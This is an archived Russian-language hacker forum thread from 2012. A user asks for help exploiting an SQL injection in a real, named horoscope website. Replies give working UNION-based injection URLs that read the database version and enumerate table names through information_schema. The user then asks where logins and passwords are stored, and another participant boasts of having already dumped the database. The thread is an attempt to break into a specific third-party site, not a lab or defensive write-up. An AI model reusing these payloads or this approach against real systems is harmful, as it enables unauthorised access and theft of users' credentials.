Добро пожаловать! Это — архивная версия форумов на «Хакер.Ru». Она работает в режиме read-only.
 

Нашел Blind SQL Injection, ищу помощи с инжектом

Пользователи, просматривающие топик: none

Зашли как: Guest
Все форумы >> [Уязвимости] >> Нашел Blind SQL Injection, ищу помощи с инжектом
Имя
Сообщение << Старые топики   Новые топики >>
Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-24 02:57:45.570000   
Chaz

Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
Привет! Искал в нете гайды по поводу инжекта Sql, долго мучался, но почему-то нет результата, возможно у меня какая-то особенная ситуация, прошу объяснить как использовать данную уязвимость в моем случае. Уязвимая ссылка из сканера - enzocom.net/user.php?horoscop=horoscop&id=21173&sign=capricorn%27%20and%20104-102%3d%271
Post #: 1
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-24 11:15:07.200000   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
Как вы надоели со своими сканерами.
Обычная скуля, не слепая.

http://enzocom.net/user.php?horoscop=horoscop&id=21173&sign=capricorn'+and+1=0+union+select+version()–+
Post #: 2
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-25 12:21:00.083333   
Feniks000

Сообщений: 13
Оценки: 0
Присоединился: 2011-11-07 17:30:41.736666
Как вы это понимаете… Мне дыру найти надо и БД слить..
Post #: 3
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-25 18:00:06.173333   
Heitz

Сообщений: 84
Оценки: 0
Присоединился: 2012-02-27 23:54:14.600000
а я слил уже)
Post #: 4
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-26 14:27:23.586666   
r1dex

Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
Отлей ему, раз он сам не может xD
Post #: 5
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-26 15:37:42.510000   
Heitz

Сообщений: 84
Оценки: 0
Присоединился: 2012-02-27 23:54:14.600000
пусть сам учится, я сам тоже с такого начинал) Нечего халявой кормить, а то привыкнет народ на халяву рассчитывать))
Post #: 6
RE: Нашел Blind SQL Injection, ищу помощи с инжектом - 2012-03-30 00:31:40.400000   
Chaz

Сообщений: 15
Оценки: 0
Присоединился: 2011-05-29 18:30:14.986666
окей, нашел имена других таблиц http://enzocom.net/user.php?horoscop=horoscop&id=21173&sign=capricorn'+and+0=1+union+select+group_concat(table_name)++from+information_schema.tables+where+table_schema!=0x696e666f726d6174696f6e5f736368656d61–+
парни! подскажите хоть или я туда рою, и в какой таблице искать логины с паролями?
ну все ппц. уже закрыли эту дырку и нифига не выводится. спс помогли, блеа
Post #: 7
Страниц:  [1]
Все форумы >> [Уязвимости] >> Нашел Blind SQL Injection, ищу помощи с инжектом







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.